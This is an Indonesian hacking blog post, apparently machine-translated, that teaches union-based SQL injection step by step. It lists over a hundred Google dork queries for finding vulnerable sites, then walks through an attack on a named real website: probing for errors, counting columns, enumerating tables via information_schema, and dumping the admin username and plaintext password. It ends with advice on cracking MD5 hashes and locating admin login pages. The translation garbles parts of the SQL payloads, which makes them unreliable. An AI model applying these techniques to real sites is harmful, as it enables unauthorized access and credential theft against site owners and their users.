FIND ADMIN PAGE

Oleh chmood

Senin, September 21, 2015

Diri bertanggung jawab atas apa yang Anda lakukan dengan informasi ini, maka diberikan untuk tujuan pendidikan saja.

Sebelum kita bahkan mulai, Anda perlu beberapa alat.

HackBar [FireFox]

Link dowload

https://addons.mozilla.org/firefox/addon/3899

|| OR ||

Anda dapat menggunakan website ini

http://home2.paulschou.net/tools/xlate/

Finder Admin

[Kami tidak akan menggunakan AdminFinder dalam tut ini, tetapi Anda akan membutuhkannya]

Admin Finder

Download link

http://uploading.com/files/KCDVDDST/admi...r.rar.html

atau

Pearl Finder

1) Pertama-download dan install ini

http://rapidshare.com/files/426832341/ActivePerl-5.10.1.1006-MSWin32-x86-291086__1_.msi

2) Download Kedua ini n ekstrak file di c drive

http://rapidshare.com/files/426832625/admin_login_finder_in_perl_language.rar

Sekarang, kita perlu sebuah situs. Untuk menemukan sebuah situs, kita perlu pergi ke Google, dan dimasukkan ke dalam salah satu dari berikut ini.

allinurl: index.php id =

allinurl:? id = trainers.php

allinurl:? buy.php kategori =

allinurl: article.php ID =

allinurl: play_old.php id =

allinurl:? newsitem.php num =

allinurl:? id = readnews.php

allinurl:? top10.php cat =

allinurl:? historialeer.php num =

allinurl:? reagir.php num =

allinurl:? Stray-Pertanyaan-view.php num =

allinurl:? forum_bds.php num =

allinurl:? id = game.php

allinurl: view_product.php id =

allinurl:? id = newsone.php

allinurl:? id = sw_comment.php

allinurl:? id = news.php

allinurl:? avd_start.php avd =

allinurl:? id = event.php

allinurl: produk-item.php id =

allinurl: sql.php id =

allinurl:? id = news_view.php

allinurl:? id = select_biblio.php

allinurl:? id = humor.php

allinurl:? id = aboutbook.php

allinurl:? ogl_inet.php ogl_id =

allinurl:? id = fiche_spectacle.php

allinurl:? id = communique_detail.php

allinurl:? id = sem.php3

allinurl:? id = kategorie.php4

allinurl:? id = news.php

allinurl: index.php id =

allinurl:? id = faq2.php

allinurl: show_an.php id =

allinurl:? id = preview.php

allinurl:? id = loadpsb.php

allinurl:? id = opinions.php

allinurl:? id = spr.php

allinurl: pages.php id =

allinurl:? id = announce.php

allinurl:? id = clanek.php4

allinurl:? id = participant.php

allinurl: download.php id =

allinurl:? id = main.php

allinurl:? id = review.php

allinurl:? id = chappies.php

allinurl:? id = read.php

allinurl:? id = prod_detail.php

allinurl:? id = viewphoto.php

allinurl: article.php id =

allinurl:? id = person.php

allinurl:? id = productinfo.php

allinurl:? id = showimg.php

allinurl:? id = view.php

allinurl:? id = website.php

allinurl:? id = hosting_info.php

allinurl: gallery.php id =

allinurl:? rub.php idr =

allinurl:? id = view_faq.php

allinurl:? id = artikelinfo.php

allinurl: detail.php ID =

allinurl: index.php =

allinurl:? id = profile_view.php

allinurl: category.php id =

allinurl:? id = publications.php

allinurl:? id = fellows.php

allinurl:? id = downloads_info.php

allinurl:? id = prod_info.php

allinurl: shop.php do = part & id =

allinurl:? id = productinfo.php

allinurl:? id = collectionitem.php

allinurl:? id = band_info.php

allinurl: product.php id =

allinurl:? id = releases.php

allinurl:? id = ray.php

allinurl: produit.php id =

allinurl:? id = pop.php

allinurl: shopping.php id =

allinurl:? id = productdetail.php

allinurl:? id = post.php

allinurl:? id = viewshowdetail.php

allinurl:? id = clubpage.php

allinurl:? id = memberInfo.php

allinurl:? id = section.php

allinurl:? id = theme.php

allinurl: page.php id =

allinurl:? shredder-categories.php id =

allinurl:? id = tradeCategory.php

allinurl:? product_ranges_view.php ID =

allinurl: shop_category.php id =

allinurl:? id = transcript.php

allinurl: channel_id =

allinurl: item_id =

allinurl: newsid =

allinurl:? id = trainers.php

allinurl: berita-full.php id =

allinurl:? news_display.php getId =

allinurl:? index2.php option =

allinurl:? id = readnews.php

allinurl:? top10.php cat =

allinurl:? id = newsone.php

allinurl:? id = event.php

allinurl: produk-item.php id =

allinurl: sql.php id =

allinurl:? id = aboutbook.php

allinurl:? id = preview.php

allinurl:? id = loadpsb.php

allinurl: pages.php id =

allinurl:? id = clanek.php4

allinurl:? id = announce.php

allinurl:? id = chappies.php

allinurl:? id = read.php

allinurl:? id = viewapp.php

allinurl:? id = viewphoto.php

allinurl:? rub.php idr =

allinurl:? galeri_info.php l =

allinurl:? id = review.php

allinurl: iniziativa.php di =?

allinurl:? id = curriculum.php

allinurl:? id = labels.php

allinurl:? id = story.php

allinurl:? look.php ID =

allinurl:? id = newsone.php

allinurl:? id = aboutbook.php

Untuk memeriksa apakah sebuah situs rentan, menempatkan 'setelah, seperti:

Kode:

http://www.site.com/news.php?id=5 '

Anda harus mendapatkan error SQL, seperti ini:

Kode:

PHP Warning: mysql_fetch_array (): argumen yang diberikan bukanlah MySQL hasil sumber daya yang valid di D: \ Domain \ tartanarmy.com \ wwwroot \ berita \ news.php on line 19 PHP Warning: mysql_fetch_array (): argumen yang diberikan bukanlah MySQL valid Hasil sumber daya di D: \ Domain \ tartanarmy.com \ wwwroot \ berita \ news.php on line 25

Oke, Sekarang bahwa Anda memiliki situs rentan Anda, Ill menunjukkan cara untuk melakukan injeksi SQL di atasnya.

Sakit akan melakukan injeksi saya di

Kode:

http://pakistanbodycount.org/news_detail.php?id=46

Jadi, saya menarik situs saya, dan saya menambahkan 'setelah, dan saya mendapatkan ERROR.

Ingat, ketika memeriksa kerentanan, kesalahan adalah hal yang baik.

Sekarang, saya perlu mencari tahu berapa banyak kolom berada di situs. Jadi saya mulai dengan:

Kode:

http://pakistanbodycount.org/news_detail.php?id=46 order by 3

Selalu mulai dengan 3, karena situs harus memiliki minimal 3 kolom. Jika Anda mendapatkan error pada 3, maka situs target Anda doesnt pernyataan serikat dukungan.

Ketika saya memesan dengan 3 beban halaman biasanya

Jadi situs tersebut memiliki lebih dari 3 kolom. Thats pertanda baik. Setelah 3, saya selalu pergi ke sepuluh.

Jadi:

http://pakistanbodycount.org/news_detail.php?id=46 order by 10

dan kami mendapatkan error

Jadi situs memiliki kurang dari 10 kolom.

Sekarang akan melihat sebenarnya berapa banyak kolom yang ada

Tidak ada order by 3 untuk memesan oleh 4 sampai kami mendapatkan beberapa error

ternyata bahwa kita mendapatkan error ketika kita menempatkan pesanan oleh 6

Kode: http://pakistanbodycount.org/news_detail.php?id=46 order by 6

Jadi kita mendapatkan kesalahan pada 6 itu berarti kita memiliki 5 kolom

Jadi sekarang kita perlu tahu mana yang kolom rentan. Jadi kita melakukan ini

http://pakistanbodycount.org/news_detail.php?id=-46 serikat pilih 1,2,3,4,5

PEMBERITAHUAN THE - DI DEPAN 46. Hal ini sangat penting dan harus ada setiap kali Anda melakukan Union pernyataan pilih.

Jadi tidak ada di situs Anda akan melihat beberapa angka

3,2,4

Kolom 3,2, dan 4 rentan.

Sekarang kita harus mengetahui versi SQL dari situs. Versi 5 adalah favorit kami, karena memiliki information.schema. Information.schema adalah teman kita, karena memberitahu kita hal. Artinya kita jangan harus menebak nama tabel, seperti kita akan di versi 4. Jadi untuk mengetahui apa versi situs kami berjalan, kami melakukan ini:

http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2,@@versi, 4,5

Hore! Situs kami menjalankan versi 5. Jadi bagaimana akan kita dapatkan tabel? Seperti ini.

Kode

http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2, group_concat (table_name), 4,5 dari information_schema.tables mana table_schema = database ()

Jadi sekarang di situs kami, kami melihat ini

admin, ledakan, drone, last_update, berita, halaman

Lihat di mana dikatakan admin? Thats apa yang kita inginkan. Tapi bagaimana akan kita mendapatkan info thats di sana? Seperti ini. * Jika Anda download hackbar, seperti yang saya bilang untuk, akan Anda membutuhkannya *

Kode: -

http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2, group_concat (column_name), 4,5 dari information_schema.columns mana table_name = admin

Jadi, admin adalah apa yang kita ingin masuk ke dalam, tapi menempatkan itu hanya seperti itu wont work. Kita perlu terlalu mengubahnya menjadi CHAR (). The HackBar bisa melakukan itu. Sorot apa yang Anda ingin berubah menjadi CHAR () dan klik MySQL, maka MYSQL CHAR ().

Kode: -

CHAR (97, 100, 109, 105, 110)

OR OPSI KEDUA ADALAH WEBSITE GO TO WEBSITE YANG

Masukan admin di Teks n tekan encode

sekarang lihat ke dalam box 5 [Desember / CHAR]

Anda akan melihat beberapa nomor seperti ini

97 100 109 105 110

jus mengkonversi ini tidak untuk format ini

CHAR (97, 100, 109, 105, 110)

Jadi semuanya adalah:

http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2, group_concat (column_name), 4,5 dari information_schema.columns mana table_name = char (97, 100, 109, 105, 110)

Jadi kita melihat ini

idadmin, username, password

Keluar dari itu, kami ingin username dan password, kan? Jadi, untuk mendapatkan itu, kami melakukan ini:

http://pakistanbodycount.org/news_detail.php?id=-46 serikat pilih 1,2, group_concat (username, 0x3a, password), 4,5 dari admin

0x3a adalah Hex untuk titik dua, jadi jangan khawatir tentang itu.

Ketika kita masukan itu, situs kami menunjukkan kepada kita ini:

admin: monalisa

kita beruntung bahwa password tidak terenkripsi ... Tapi pada sebagian besar situs itu

di gunakan bahwa setiap situs web md5 mendekripsi (membuat pencarian googlr ull fina banyak) atau se Kain Dan Habel atau John The Ripper (linux) untuk memecahkan md5. tetapi jika keberuntungan Anda somtimes buruk enkripsi asin yang benar-benar sulit untuk istirahat

Dan menggunakan finder admin atau mutiara finder untuk menemukan halaman admin

Category

Dork Vuln

Komentar

Postingan Lebih Baru Postingan Lama